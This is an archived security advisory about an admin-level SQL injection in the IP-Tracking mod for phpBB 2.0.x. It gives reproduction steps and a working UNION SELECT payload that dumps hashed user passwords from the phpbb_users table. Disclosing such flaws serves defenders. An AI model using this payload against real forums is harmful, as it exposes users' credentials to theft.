TUCoPS :: Web BBS :: Frequently Exploited :: tb11010.htm

SQL-Injection in IP-TRACKING Mod for phpBB2.0.x
SQL-Injection in IP-TRACKING Mod for phpBB2.0.x
SQL-Injection in IP-TRACKING Mod for phpBB2.0.x



Information: The IP-Tracking Mod is a Extension for phpBB2.0.x which 
logs all Page hits the user of the Boards do including Referer, IP and 
Username. It contains a SQL-Injection on Admin-Level. You can get it 
from: 
http://www.phpbb.de/viewtopic.php?t=63690&postdays=0&postorder=asc&start=0 

Steps to reproduce: Go into your ACP, select under IP-Tracking 
IP-Search, select "no" at use wildcards and enter in Search Query what 
you want. It is direct passed through the Query. As Search Type I used IP.

PoC: enter
' UNION SELECT user_password as 
ip,user_id,username,user_active,user_regdate,user_level,user_posts from 
phpbb_users#
as Search-Query. This will display you all the hashed Userpasswords in IP

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH